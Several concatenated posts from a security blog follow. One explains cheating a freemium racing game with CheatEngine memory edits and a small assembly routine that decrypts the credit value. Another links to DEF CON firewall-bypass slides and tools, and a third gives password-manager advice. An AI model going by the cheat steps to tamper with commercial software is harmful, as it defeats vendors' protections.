The first time a kid meets a hex-editor <i>(just like the co-author of this blog did with SIM City when he was 10 years old - David)</i>. It can teach a lot about file structures, the hexadecimal numeral system, etc. Fun times. </div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Hacking game server</h3>
<div>
<div style="text-align: justify;">
Not very common, but even more fun. Warning: endless trolling possibilities in multi-player games ahead :) How to hack a game server? Well, I think this might deserve another full blog post ...</div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Network traffic hacking</h3>
<div>
<div style="text-align: justify;">
One last necessary type of cheating is to modify network traffic between the client and the game server. AFAIK SSL is not universal in gaming, so stunnel is not needed for this hack, but ettercap can help in changing the communication.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Why cheating becomes more critical (and challenging)?</h2>
<div style="text-align: justify;">
Now in the age of in-app-payments, the game creators are no longer thinking about cheats as funny things but something to be destroyed to the ground. Because cheating decreases its revenue. Or not. At least they think it does. To quote Wikipedia here, "cheating in such games is nonetheless a legal grey area because there are no laws against modifying software which is already owned, as detailed in the Digital Millennium Copyright Act." </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A lot of online games include anti-cheating components like PunkBuster, nProtect GameGuard, or Valve Anti-Cheat. This whole cheating/anti-cheating industry is the same as the virus/anti-virus industry. A cat and mouse game.<br />
<br /></div>
<h3 style="text-align: justify;">
Freemium games</h3>
<div style="text-align: justify;">
If you have not played with "freemium" games, you should watch South Park season 18, episode 6. - "Freemium Isn't Free." If you did play with freemium games, you definitely have to watch it :) There are many problems with freemium games. It is free to install, free to play. The first 3-4 hours might be fun to play. But after that, it turns out it is impossible to advance in the game without paying money for it. And by spending cash, I mean spending a LOT! Let's have a look at today's example, an arcade racing video game.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuxlxeqZxfwfgKyiMTM2r16RarOfNfyS_FW-B4f2IkY1tJbrY2gxtRx6b4efnRkmp2SFVTZz4kl7jooa-QeWc90qTnn-BATQjj5omwaSSyBg4tZ0jFvKlpDzvonmZAAyDEvWcoYx2G064g/s1600/asphalt1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuxlxeqZxfwfgKyiMTM2r16RarOfNfyS_FW-B4f2IkY1tJbrY2gxtRx6b4efnRkmp2SFVTZz4kl7jooa-QeWc90qTnn-BATQjj5omwaSSyBg4tZ0jFvKlpDzvonmZAAyDEvWcoYx2G064g/s1600/asphalt1.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For 99.99 USD, you can get 3 000 000 credit. For almost double the price of a new PC game, you can get these credits. In this particular game, I estimate one have to play ~6-24 hours constantly to get this amount of credit. But by playing ~6 hours, I mean 6 hours without progress in the game! Kind of boring. And what do you get from 3 000 000 credit? You can buy one of the most expensive cars, but can't tune them fully. You have to play more (without progress) or buy more. But guess what, there are more cars you can't buy by only playing the game. Those are only available via in-app-purchase.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuuxO5-eaLaMeXTg3W3dmrzA6lShjuBK9bdsBTnOMqYFBJSVgL_6cDeRP3LS2WcRZBoR2uGBuo_Yqavt-zhyphenhyphenvXAHpirpSYuYGlOx-eCzr6ipOL2tDzbnwa0Pgi1uZMXqFPNubqZaNIU_yg/s1600/asphalt2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuuxO5-eaLaMeXTg3W3dmrzA6lShjuBK9bdsBTnOMqYFBJSVgL_6cDeRP3LS2WcRZBoR2uGBuo_Yqavt-zhyphenhyphenvXAHpirpSYuYGlOx-eCzr6ipOL2tDzbnwa0Pgi1uZMXqFPNubqZaNIU_yg/s1600/asphalt2.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Even though the player has 58 765 533 credits, it is not possible to buy this car. Only available through real money.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT18_zJPF0nZLzDiaJdnI00Lvxk8B1Qw8S5gM0yGdLoUeCBbnSZRrKEX0LmXBL6UM_5tEve19-FET8nYCW5Kd-NqwUse8CiGIKIsPBH_pml_jHjuC8kKN59_vV6WWMypk_vEa_CCToSsx/s1600/asphalt3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT18_zJPF0nZLzDiaJdnI00Lvxk8B1Qw8S5gM0yGdLoUeCBbnSZRrKEX0LmXBL6UM_5tEve19-FET8nYCW5Kd-NqwUse8CiGIKIsPBH_pml_jHjuC8kKN59_vV6WWMypk_vEa_CCToSsx/s1600/asphalt3.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, what are your possibilities? You are either Richie Rich, and can afford the money to buy these. Or you can be insane, and try to play the game without in-app-purchase. Or give up the game and try another freemium ... Or, you can try to hack the game!<br />
<br /></div>
<h2 style="text-align: justify;">
Hack all the freemium games!</h2>
<div style="text-align: justify;">
Although I was not playing this racing game from day one, I was able to witness the evolution of the cheats against this game. The cheats which worked in one day was not working one month later. The game is continuously updated to defeat the newly published cheats.<br />
<br /></div>
<h3 style="text-align: justify;">
Noob start</h3>
<div style="text-align: justify;">
So, I want to hack this game, what is the first thing a noob like me does? <strike>Bing it!</strike> Google it! </div>
<div style="text-align: justify;">
From the first page result, let's check this tool:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNg2I-l4MAhSbytqgdO45sAluDHkw8nm0xdLj1Dn8hEPqKfiX16oF-pzo-Mu-R2PWIajkuydCn9Aet7gObkdS2SMyeAY37se1vSnPgBnWYvPhdUupXAkdnUjCwCSVHF6qkeQS3VWRqkl0A/s1600/Asphalt-8-Airborne-Hack-Tool-Screenshot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNg2I-l4MAhSbytqgdO45sAluDHkw8nm0xdLj1Dn8hEPqKfiX16oF-pzo-Mu-R2PWIajkuydCn9Aet7gObkdS2SMyeAY37se1vSnPgBnWYvPhdUupXAkdnUjCwCSVHF6qkeQS3VWRqkl0A/s1600/Asphalt-8-Airborne-Hack-Tool-Screenshot.png" width="390" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
While trying to download that, I just have to give my email address to spammers, or my mobile number will be subscribed to premium rate text messages. What fun.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNd4e2Phf4nqqyf8Ma3lWWmkhU8iVOsu-3QAYUSadm_9DrgcsqyXZBjKY9bx3nQNdB9s9ZtHkceQ5ci_oa4n4q6nsGrKSfbMighfSqgZfKGTk8dei9azgVBZe6BB8DQWv3IQxAB2HJlY9/s1600/asphalt4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNd4e2Phf4nqqyf8Ma3lWWmkhU8iVOsu-3QAYUSadm_9DrgcsqyXZBjKY9bx3nQNdB9s9ZtHkceQ5ci_oa4n4q6nsGrKSfbMighfSqgZfKGTk8dei9azgVBZe6BB8DQWv3IQxAB2HJlY9/s1600/asphalt4.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Another "cheat" program will install malware/adware on your computer. <b><u><span style="color: red;">Never ever try these programs.</span></u></b> They are fake 99% of the time and after installing those you will have another problem, not just how to hack freemium games.<br />
<br /></div>
<h3 style="text-align: justify;">
Beginners start - Cheat engine</h3>
<div>
<span style="text-align: justify;">When I first heard about hacking games in memory, I visualized hours of OllyDBG/ImmunityDBG/(insert your favorite Windows debugger here). It turned out, there are some specialized tools to help you with cheating the game. No assembly knowledge required. My favourite tool is </span><a href="http://www.cheatengine.org/downloads.php" style="text-align: justify;" target="_blank">CheatEngine</a><span style="text-align: justify;">. I highly recommend to download it and spend 10 minutes to get past the built-in tutorial levels to get a feeling about this tool. It's super duper awesome.</span><br />
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjp-D9wj1bvaIGBVHCNrKsk9rbyHvYgicQR7y0P9qf0b10Ob1x_3trBwBKC0IhfMJ4qXNFOpGdUWzxViRyFSLXD9LpWKC5NE5tz90PmDI1Oo_zLWbXUJX9mOlHzsVPX-HhyphenhyphendZolMyyCvXv/s1600/cheat.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjp-D9wj1bvaIGBVHCNrKsk9rbyHvYgicQR7y0P9qf0b10Ob1x_3trBwBKC0IhfMJ4qXNFOpGdUWzxViRyFSLXD9LpWKC5NE5tz90PmDI1Oo_zLWbXUJX9mOlHzsVPX-HhyphenhyphendZolMyyCvXv/s1600/cheat.png" width="640" /></a></div>
<div>
<span style="text-align: justify;"><br /></span></div>
<div>
<span style="text-align: justify;"><br /></span></div>
<div>
<div style="text-align: justify;">
When I first tried to hack this game myself, I scanned the memory for my actual credit and tried to change that, no luck. Keep reading, you will see what happened.<br />
<br />
The second cheat I tried with cheat engine was <a href="https://www.youtube.com/watch?v=kz9k4vOpns0" target="_blank">something like this</a>: </div>
</div>
<div>
<ol>
<li style="text-align: justify;">Start the game, play the first level, and check how many credits is paid for winning the race. Pro tip: use dual display for full-screen game cheating.</li>
<li style="text-align: justify;">Restart the same level, attach Cheat Engine to the game's process</li>
<li style="text-align: justify;">Scan the memory for the same value at the beginning of the race</li>
<li style="text-align: justify;">Scan the memory for the same value at the end of the game. The intersect of the first and second scan includes the real value where the credit is stored for winning the race.</li>
<li style="text-align: justify;">Change the values (both the real one and some false positives) to something big</li>
<li style="text-align: justify;">Watch the game to crash</li>
<li style="text-align: justify;">Be amazed at the money you received</li>
</ol>
<div>
<div style="text-align: justify;">
Nowadays, most of the cheats on YouTube does not work. Except for these <a href="https://www.youtube.com/watch?v=f5a3CGVLwAI" target="_blank">kind of cheats</a>. I don't want to recreate that tutorial, so you should watch it first then come back.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Wqfoe7HWj-c2Jrwx6J4bLcand3l0Jjsi946Csouii9L7TiOv48ixFnAzEtXjo74ml1c6xaVCrI5Ltnt5mPjOmeDeD5no4Kz3lPFu2qbAhHy7TD9i7K6OE8ZtpaEQ5HQhVEvr2pohlWnn/s1600/asphalt5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Wqfoe7HWj-c2Jrwx6J4bLcand3l0Jjsi946Csouii9L7TiOv48ixFnAzEtXjo74ml1c6xaVCrI5Ltnt5mPjOmeDeD5no4Kz3lPFu2qbAhHy7TD9i7K6OE8ZtpaEQ5HQhVEvr2pohlWnn/s1600/asphalt5.png" width="616" /></a></div>
<br />
<br /></div>
</div>
</div>
<div>
<div style="text-align: justify;">
Are you back? Great. Do you have any idea what have you just seen? No? Well, in this case, don't try this at home. Copy-pasting <a href="http://blog.zoller.lu/2009/07/0pen0wnc-shellcode-dissasembled.html" target="_blank">assembly code from random internet posts</a> and running on your computer is always a bad idea. It is precisely as risky as downloading free programs from random internet sites.<br />
<br />
Although I have not seen people trolling others with this cheat engine type of shellcode, I think the time will come when these will be turned into something terrible. These shellcodes might work, or might harm your computer. The good news is, we can have a look at the code and analyze it. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
When you open CheatEngine and try to define a new custom type, you are greeted with a skeleton assembly code. I don't want to detail what all the skeleton code does, let's just focus on the difference between the skeleton code and the code used in the video. This is the "decrypt function":</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<pre class="prettyprint">xor eax, 0baadf00d
rol eax, 0e
</pre>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
What does it mean? The actual credit is encrypted in memory. If you want to scan it in memory, you won't be able to find it. But! The encryption is rotating the value to the right (ROR) with 0xE (14 in decimal), and after that, it is XOR-ed with 0xbaadf00d. Decrypting it is the inverse of the functions in reverse order (in this particular case, the order does not matter, but that's not the point). The inverse function of XOR is XOR, and the inverse function of ROR (rotate right) is ROL (rotate left). Now that we analyzed the assembly code, we can be sure that it is safe to execute. Just follow the video and see your coins falling from the sky. For free. In a freemium game. Have fun!<br />
<br />
<h3>
Encrypt memory - applications at financial institutions</h3>
</div>
<div style="text-align: justify;">
Another exciting thing is that I don't recall any thick client applications in the financial industry encrypting the values in memory. And I agree, there are more significant problems with thick client applications than not encrypting the essential values in memory. But still, some thick client applications are regularly updated, maintained. Maybe it is a good idea to encrypt the values in memory. It will make attackers' life harder. Not impossible, but harder. Perhaps the developers of these applications should learn from the gaming industry (or from malware developers for that matter) because it is a shame that an arcade racing game or an FPS is protected better than an application responsible for transacting millions of dollars. Just think about the RAM scraping malware stealing millions of credit card data ...<br />
<br /></div>
<h2 style="text-align: justify;">
Moral of the story</h2>
</div>
<div style="text-align: justify;">
Cheating is part of the gaming history, and the freemium games are trying to take away the cheats from the gamers because they want money. Thanks to CheatEngine and some clever hacks, these programs can be still beaten. And guess what, there is CheatEngine for Android - although it did not work for me on the latest Android. And sometimes, hacking all kinds of applications can be more comfortable with CheatEngine, compared to traditional debuggers.<br />
<br />
Also, always check the code before executing it! And when you find something cool, publish it, so everyone could enjoy the games!<br />
<br />
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com5tag:blogger.com,1999:blog-7429675726481888518.post-12748424282645016472014-11-09T15:05:00.000+01:002014-12-08T00:56:53.653+01:00Bypass hardware firewallsThis is just a collection of links about my DEF CON 22 presentation, and the two tools I released:<br />
<br />
Slides:<br />
<a href="http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds" target="_blank">http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds</a><br />
<br />
Tools:<br />
<a href="https://github.com/MRGEffitas/Write-into-screen" target="_blank">https://github.com/MRGEffitas/Write-into-screen</a><br />
<a href="https://github.com/MRGEffitas/hwfwbypass" target="_blank">https://github.com/MRGEffitas/hwfwbypass</a><br />
<br />
Presentation video from Hacktivity:<br />
<a href="https://www.youtube.com/watch?v=KPJBckmhtZ8" target="_blank">https://www.youtube.com/watch?v=KPJBckmhtZ8</a><br />
<br />
Technical blog post:<br />
<a href="https://blog.mrg-effitas.com/bypass-hardware-firewalls-def-con-22/" target="_blank">https://blog.mrg-effitas.com/bypass-hardware-firewalls-def-con-22/</a><br />
<br />
Have fun!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnZ8BkQ0ffrygrDsMHGElmqec36pP9WV-qOv9Lj3PB6Lv-5gR68Q0DJp-SwQAtwd0igRe0rASdUOwnyxlPUvrWApN_LgKIl2nXCMUBrEVsqrlfAmRkOlDApeu6gz2EJFEVENCQ2ntsMbC/s1600/hwfwbypass+(1).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnZ8BkQ0ffrygrDsMHGElmqec36pP9WV-qOv9Lj3PB6Lv-5gR68Q0DJp-SwQAtwd0igRe0rASdUOwnyxlPUvrWApN_LgKIl2nXCMUBrEVsqrlfAmRkOlDApeu6gz2EJFEVENCQ2ntsMbC/s1600/hwfwbypass+(1).jpg" height="240" width="320" /></a></div>
<br />
<br />
<br />Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-62905904511019320182014-10-13T12:40:00.004+02:002019-10-08T15:47:54.314+02:00Change passwords regularly - a myth and a lie, don't be fooled, part 2<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">previous blog post</a>, I have covered the different passwords you have to protect, the attackers and attack methods. Now let's look at how we want to solve the issue. </div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Password requirements</h2>
<div style="text-align: justify;">
So far we have learned we have to use long, complex, true random passwords. In theory, this is easy.</div>
<div style="text-align: justify;">
Now, this is my password advice for 2014:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password character classes</b></div>
<div style="text-align: justify;">
Use upper-lower-digit-special characters in general cases.</div>
<div style="text-align: justify;">
If you don't understand what I just write, choose from this:</div>
<div style="text-align: justify;">
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789-=[];'\,./<>?:"|{}_+!@#$%^&* ()`~</div>
<div style="text-align: justify;">
If you are a CISO, and say: use 3 out of 4 character class, everyone will use Password12 or Welcome12 as their password (after the 12th enforced password change).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length</b></div>
<div style="text-align: justify;">
This is basically the only thing which changes whether the password is in the very high/high/medium/low level. Check the previous blog post for the details about very high/high/medium/low level.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: Very high level class (including work-related/enterprise passwords)</b></div>
<div style="text-align: justify;">
15 character (or 20 if you are really paranoid). Making true random passwords longer than 20 characters usually does not make any sense, even in high security scenarios (e.g. military, spy agencies, etc.). 15 character in Windows environment is a right choice, as LM hash is incompatible with 15 character passwords, thus one (effective) attack won't work. Beware, there might be bugs with using 15 character passwords, with a low probability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: High-level</b><b> class</b></div>
<div style="text-align: justify;">
12 character, upper-lower-special characters</div>
<div style="text-align: justify;">
<b><br /></b><b>Password length: </b><b>Medium class</b></div>
<div style="text-align: justify;">
10 character, upper-lower-special characters, still <a href="http://www.gergely.risko.hu/debian-dsa1571/random4.jpg" target="_blank">TRUE random</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: Low-level</b><b> class</b></div>
<div style="text-align: justify;">
9 character. Why less?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Pin codes</b></div>
<div style="text-align: justify;">
Always choose the longest provided, but a maximum of 8. Usually, more is pretty impractical.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password randomness</b></div>
<div style="text-align: justify;">
True random, generated by a (local) computer. Avoid Debian. Avoid random generated by your brain. Do not use l33tsp33k. Do not append or prepend the current month, season or year to a word. Do not use Star Wars/Star Trek/(your favorite movie/series here) characters or terminology. In general, avoid any pattern like the above ones. The chances that a true random password generator generates SkyWalker12 is very-very low. And believe me, it is not that hard to crack those. Every algorithm that you would come up with; the bad guys have already thought of it. Use true random. Let the computer do it for you. See details later in this post.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password history</b></div>
<div style="text-align: justify;">
Never-ever reuse passwords. NEVER!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password change period</b></div>
<div style="text-align: justify;">
If it is not enforced otherwise, don't bother to change it twice in a year. But! Check if the password cracking speed made your current ones obsolete. If yes, change the obsolete passwords. Immediately change the password if you have been notified that the service you use has been compromised. Immediately change all of your recently used passwords if you suspect malware was running on your computer (do this on a known clean computer). Immediately change your password if you have used it on a computer you don't own, or there is a small chance malware is running on it. Change it if you really had to give your password to someone. Otherwise, goodbye regular password change. We will miss you...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are a CISO, and writing security policies, you should have to enforce the password change period based on: do you allow LM hashes? What is the password length requirement for users and administrators? What is the current hash cracking speed, and the forecast for the next 2 years? I think people would be happy to increase their passwords with 1-2 characters, if they are not forced to change it frequently (e.g. every month).<br />
<span style="font-size: small;"><span style="font-weight: normal;">Now after I was sooo smart giving advises people still hate to implement, let's see the practical implementations. At least some people might like me, because I told them not to change the passwords regularly. Next time someone tells you to change all your important passwords regularly, put a lie detector on him, and check if he changes all of his passwords regularly. If he lies, feel free to use the <a href="http://xkcd.com/538/" target="_blank">wrench algorithm</a> to crack his passwords. If he was not lying, call 911, to put a straitjacket on him.</span></span><span style="font-size: small; font-weight: normal;"> Only insane paranoid people do that in reality. Others are just too scared to say "what everyone recommended so far is bullshit". Comments are welcome ;) Other people might hate me for telling them using true random passwords. Don't panic, keep reading.</span></div>
<div style="text-align: justify;">
And don't forget to use 2 factor authentication. It might seem a bit of an overkill at the beginning, but after months, you won't notice using it.</div>
<br />
<h2>
(Bad and good) solutions</h2>
<div>
<h3>
I will use the same password everywhere</h3>
<div>
This is a pretty bad idea. If one of the passwords are compromised, either the attackers can access your other sites, or you have to change all of your passwords. There are better ways to spend your life on earth than changing all of your passwords.<br />
<br />
<h3>
I will remember it</h3>
<div>
Good luck remembering 250 different, complex passwords. Don't forget to change them regularly! ;)</div>
<br />
<h3>
I will use the password recovery all the time</h3>
<div>
Not a very user-friendly solution. And because the security answer has to be as complicated as the password itself, the problem has not been solved.</div>
<br />
<h3>
I will write it down into my super-secret notebook and put it in my drawer</h3>
<div>
Although it might work in some cases, it won't work in others. I don't recommend it.<br />
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZvfTX1NLWBJxTA8Qb1FdLvPtHIIpPQYuEabqB6EGqcxmOL5UMu18jw5bjz5N1aobcmWR7oe5Ca3FyvrBcy0rLUzr9Zln60OfhE0GKAAZF7C1wjgETwjTb-AXBaiZYvfCEiCOT1sZmseo/s1600/interior.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZvfTX1NLWBJxTA8Qb1FdLvPtHIIpPQYuEabqB6EGqcxmOL5UMu18jw5bjz5N1aobcmWR7oe5Ca3FyvrBcy0rLUzr9Zln60OfhE0GKAAZF7C1wjgETwjTb-AXBaiZYvfCEiCOT1sZmseo/s1600/interior.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiFH6sRmc8JqmBlVJ0j26c27hN3cSNmS_JJEJXSN8DOc9yDx-wLMqlE7R68hufbTKxW9LoaL0f2vaD8YfAmukEnSJZgbGHZfeCyFBE0QItjAQJ4o2B7wzAEmPCXxYWytUjJdfOSEZTNF_D/s1600/monitor.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiFH6sRmc8JqmBlVJ0j26c27hN3cSNmS_JJEJXSN8DOc9yDx-wLMqlE7R68hufbTKxW9LoaL0f2vaD8YfAmukEnSJZgbGHZfeCyFBE0QItjAQJ4o2B7wzAEmPCXxYWytUjJdfOSEZTNF_D/s1600/monitor.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<h3 style="text-align: justify;">
I will use an algorithm, like a base password, and add the websites first letters to the end of the password</h3>
<div style="text-align: justify;">
Still better than using the same password everywhere, but believe me, if this is a targeted attack, it is not that hard to guess your password generation algorithm.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
I will use the advice from XKCD, and use the password correcthorsebatterystaple</h3>
<div style="text-align: justify;">
Still a lot better than simple passwords, but <a href="http://nakedsecurity.sophos.com/2012/03/19/multi-word-passphrases/" target="_blank">unfortunately, people are still bad at choosing random words with random order</a>, so it is not the best solution. And again, you can't memorize 250 different passwords ... Even 10 is impossible. Only use this method in special corner cases (see details later), and use a passphrase generator!</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
I will use a <u>password manager</u></h3>
</div>
</div>
<div style="text-align: justify;">
This is the very first good idea. It solves the problem of remembering 250 different complex and random passwords. Some people might complain about using a password manager, here are those complaints. And my answers:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>If someone gets access to this one password store, all is lost.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If someone accessed your password store, and the master password, you can be pretty damn sure that most of your passwords are already stolen. For extra paranoids, you can use multiple password stores, one for daily use, one for rare cases. Beware not to forget the password for the second one ;)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>What if I don't have access to the password store when I need it?</u></div>
<div style="text-align: justify;">
<b>Answer</b>: In the age of cheap notebooks, tablets, and smartphones, in 99% of the cases you should not use that important password on any other device than yours. In the rare cases when you must, you can use either your smartphone to get the password, or use a browser extension like <a href="https://chrome.google.com/webstore/detail/pawhash/adgekjfphhgngpdoklolpjenmgneobfg" target="_blank">Password hasher</a> to generate different passwords to different websites, with one password. For extra paranoids, you can have different master passwords for the different security levels. And don't forget to change the password after you are back at your own computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>What if I forgot the one password to the password store?</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If you use your password manager daily, it has the same odds to forget that one password as it is to forget every one of your passwords.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Password managers make phishing attacks easier.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: Who started this nonsense? Good password managers decrease the risk of phishing.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Password managers have the same vulnerabilities as other websites or software.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: Well, this is <a href="http://devd.me/papers/pwdmgr-usenix14.pdf" target="_blank">partially true</a>. There are at least 3 types of password managers, from most secure to least: offline, browser built-in, online. Online password managers give better user experience, with a sacrifice in security. But if you choose one of the leading password managers, and you are a simple home user, the risks are negligible. If you try to store your work password in an online password store, you might violate your internal security policy. For paranoids, use offline password managers, and back them up regularly. If you choose an online password manager, at least use 2-factor authentication. And don't forget, your Chrome password can be easily synchronized to the cloud, shifting it to the online category.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>In some cases, like Full Disc Encryption, OS login, smartphone login, or password manager login, the auto-type of password from the password manager is not available, thus choosing a true random password is a pain in the a$$.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: True. Generate pronounceable passwords or passphrases in these corner cases, e.g. with the Linux tool apg you can generate pronounceable passwords. For easy and fast type, don't use capital letters (only lower-alpha - digit - special) in the original password, but increase the length of the password. Add 1 extra character because you don't use upper case letters, add 3 other because it is a pronounceable password, and you are good to go. For extra paranoids change one or two of the letters to uppercase where it is convenient. </div>
<div style="text-align: justify;">
apg -M SNL -m 15 is your friend.</div>
<div style="text-align: justify;">
If you want to check what I write here (always a good idea), test the entropy of a true random 10 character password with all character classes, and check it with 14 characters, without uppercase. I recommend KeePass for that. If you comment on this that "Keepass can not measure that it is a pronounceable password, thus the entropy is lower in reality", my answer is: "Check out the current passwords used by users, and current password advises, and tell me if this password is a lot better or not ..." . You have been warned.</div>
<div style="text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHSeFfNJqZ9hiiluvbs3u6MrllZoqzREjsKZRIJEj86RPdop-SK6G8nVCAv-RaGWk0rKeu4VgqIrhQORAnSo3Rdkfkw3DlBsKOBn0Z3BMgbM1AvEN4WGx4QfK5JY9YbmhyphenhyphenjPdqeL2wQKE/s1600/pronouncable.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHSeFfNJqZ9hiiluvbs3u6MrllZoqzREjsKZRIJEj86RPdop-SK6G8nVCAv-RaGWk0rKeu4VgqIrhQORAnSo3Rdkfkw3DlBsKOBn0Z3BMgbM1AvEN4WGx4QfK5JY9YbmhyphenhyphenjPdqeL2wQKE/s1600/pronouncable.png" width="320" /></a></div>
<br />
For the high-level password class, I don't recommend anything your brain generated. There are also suitable <a href="http://pwgen-win.sourceforge.net/" target="_blank">offline passphrase generators</a>. Use at least 5-6 words for passphrases.<br />
<br />
<div style="text-align: justify;">
<u>Password managers are not user-friendly, it takes more time to log in.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If you set auto-type/auto-fill, and the password manager is opened once a day (and you lock your computer when you leave it), in this case, logging in takes less time than typing it! It is more convenient to use it, rather than typing the passwords every time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>I like to create new unique passwords every time I create a new account, and password managers take the fun away from it.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: <a href="http://janrain.com/about/newsroom/press-releases/online-americans-fatigued-by-password-overload-janrain-study-finds/" target="_blank">Said no one, ever!</a> "38 percent of people think it sounds more appealing to tackle household chores – from folding the laundry to scrubbing toilets – than to try and come up with another new user name or password."</div>
